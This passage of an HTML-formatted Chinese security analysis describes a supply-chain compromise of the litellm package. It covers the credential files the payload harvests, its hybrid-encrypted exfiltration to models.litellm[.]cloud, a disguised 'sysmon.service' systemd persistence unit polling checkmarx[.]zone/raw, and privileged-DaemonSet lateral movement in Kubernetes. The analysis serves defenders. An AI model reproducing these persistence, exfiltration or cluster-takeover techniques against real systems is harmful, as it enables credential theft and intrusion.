223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可窃取代码、投毒更多仓库</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">K8s Service Account</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">/var/run/secrets/...</span></span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">集群横向移动、特权提升</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">加密货币钱包</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">~/*wallet*</span></span><span style="box-sizing: border-box;"><span leaf="">, </span></span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">~/.bitcoin/*</span></span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接经济收益</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Shell 历史</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">~/.bash_history</span></span><span style="box-sizing: border-box;"><span leaf="">, </span></span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">~/.zsh_history</span></span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可能包含敏感命令和密码</span></p></div></div></td></tr></tbody></table></p></div><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">阶段三：加密外泄</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者使用混合加密方案，确保即使流量被截获也无法解密。</span></p><div style="font-size: 16px;text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="0.8342592592592593" data-s="300,640" data-type="jpeg" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100011145" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=c42765b0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCkm10BicAGwTicmFo8Fv4J5Bxu5AssMBmEwQJazMkQbD2v8WYyD53Ah1Wrb9RLXBu24uHTk9BiavM0eAfY4xu3THicYSNWgxFyMRkA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><div style="font-size: 16px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">加密方案设计：</span></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">对称层：</span></strong><span leaf="">AES-256-CBC 加密实际数据，效率高、速度快</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">非对称层：</span></strong><span leaf="">RSA-4096 加密 AES 会话密钥，只有攻击者能解密</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">密钥管理：</span></strong><span leaf="">RSA 公钥硬编码在恶意代码中，私钥仅攻击者持有</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这种设计意味着：</span></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">流量分析只能看到加密数据，无法获知窃取了什么</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即使发现外泄，也无法确定具体损失范围</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者可以&#34;批量&#34;收集数据，再离线解密分析</span></p></li></ul></div><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">阶段四：持久化驻留</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">载荷安装用户级 systemd 服务，确保长期存在并等待后续指令。</span></p><div style="font-size: 16px;text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="0.812962962962963" data-s="300,640" data-type="jpeg" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100011149" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=72e938c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCkPibNiapaBs60yPEIUIslndUHRQzxJdib2pKR0TTJmvbY8VVbPe8HjEGW8nL5iaVIgcve0v9EsfzMRHkRMklic9VmasXqa1acWHpHw%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><p style="font-size: 16px;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">持久化技术细节：</span></p><span style="font-size: 16px;height: auto !important;"><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="cs"><code><span leaf="">Python</span></code><br/><code><span leaf=""><span class="code-snippet__meta"># sysmon.service 伪装成系统监控服务</span></span></code><br/><code><span leaf="">[<span class="code-snippet__meta">Unit</span>]</span></code><br/><code><span leaf="">Description=System Monitor Service</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf="">[<span class="code-snippet__meta">Service</span>]</span></code><br/><code><span leaf="">ExecStart=%h/.config/sysmon/sysmon.py</span></code><br/><code><span leaf="">Restart=always</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf="">[<span class="code-snippet__meta">Install</span>]</span></code><br/><code><span leaf="">WantedBy=<span class="code-snippet__literal">default</span>.target</span></code><br/></pre></p></span><p style="font-size: 16px;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">驻留脚本会：</span></p><ol style="font-size: 16px;list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期轮询 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">checkmarx.zone/raw</span></span><span leaf=""> 获取指令</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">下载并执行 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">/tmp/pglog</span></span><span leaf=""> 中的任意代码</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">使用 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">/tmp/.pg_state</span></span><span leaf=""> 维护状态，避免重复执行</span></p></li></ol><p style="font-size: 16px;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">威胁特征</span></strong><span leaf="">：攻击者可以随时推送新功能——挖矿、勒索软件、更多凭据窃取工具——无需重新感染。</span></p><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">阶段五：Kubernetes 横向移动</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">当检测到 Kubernetes 环境时，载荷自动创建特权 DaemonSet 实现集群范围感染。</span></p><div style="font-size: 16px;text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="0.9907407407407407" data-s="300,640" data-type="jpeg" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100011150" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=f7bd8059&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCnJIria0gXECt3yqADq7JEzvPltWxnrshLTX5cicCbFWW1GhGw1o1pGzRebboeosyWCBNibO0R87JwbibyuS5Cj7Gibg3PibArZa7GTc%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><p style="font-size: 16px;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击路径：</span></strong></p><ol style="font-size: 16px;list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">检测环境：检查 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">/var/run/secrets/kubernetes.io/serviceaccount/token</span></span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">创建特权 Pod：</span></strong></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">横向移动：</span></strong><span leaf="">DaemonSet 确保每个节点都运行恶意 Pod</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">数据窃取：</span></strong><span leaf="">通过 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">/host </span></span><span leaf="">路径访问节点上所有文件，包括其他 Pod 的 secrets</span></p></li></ol><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">后果：</span></strong><span leaf="">一个被感染的容器可以扩散到整个集群，窃取所有命名空间的 secrets，甚至在集群中部署挖矿或勒索软件。</span></p><div style="font-size: 16px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: center;box-sizing: border-box;"><div style="margin: 0px 0px 4px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2.4 加密与外泄</span></strong></p></div></div></div></div><div style="font-size: 16px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者使用混合加密方案保护窃取的数据：</span></p><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">对称加密：</span></strong><span leaf="">AES-256-CBC 加密收集的数据</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">非对称加密：</span></strong><span leaf="">RSA-4096 加密 AES 会话密钥</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">外泄：</span></strong><span leaf="">POST 到 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">models.litellm[.]cloud</span></span><span leaf="">，</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">Header X-Filename: tpcp.tar.gz</span></span></p></li></ol><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">由于只有攻击者持有 RSA 私钥，即使截获外泄流量也无法解密。</span></p></div><div style="font-size: 16px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: center;box-sizing: border-box;"><div style="margin: 0px 0px 4px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2.5 持久化机制</span></strong></p></div></div></div></div><div style="font-size: 16px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">恶意载荷安装了一个名为 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">sysmon.service</span></span><span leaf=""> 的用户级 systemd 服务，通过 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">~/.config/sysmon/sysmon.py</span></span><span leaf=""> 执行：</span></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">轮询 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf=""><a href="https://checkmarx[.]zone/raw" target="_blank">https://checkmarx[.]zone/raw</a></span></span><span leaf=""> 获取后续指令</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">下载 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">/tmp/pglog</span></span><span leaf=""> 并执行</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">使用 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">/tmp/.pg_state</span></span><span leaf=""> 维护状态</span></p></li></ul></div><div style="font-size: 16px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: center;box-sizing: border-box;"><div style="margin: 0px 0px 4px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2.6 Kubernetes 横向移动</span></strong></p></div></div></div></div><div style="font-size: 16px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">载荷检测到 Kubernetes 服务账户 token 时会：</span></p><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">创建特权 DaemonSet node-setup-*</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">挂载主机根文件系统</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在每个节点上部署恶意 Pod</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">实现集群范围的横向移动</span></p></li></ol></div><div style="font-size: 16px;display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">03 影响范围</span></span></strong></p></div></div></div></div><div style="font-size: 16px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: center;box-sizing: border-box;"><div style="margin: 0px 0px 4px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3.1 直接依赖</span></strong></p></div></div></div></div><div style="font-size: 16px;min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">项目</span></strong></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">月下载量</span></strong></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">依赖类型</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">litellm</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">95M</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">-</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CrewAI</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">5.9M</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接依赖</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Browser-Use</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">4.2M</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接依赖</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Opik</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: 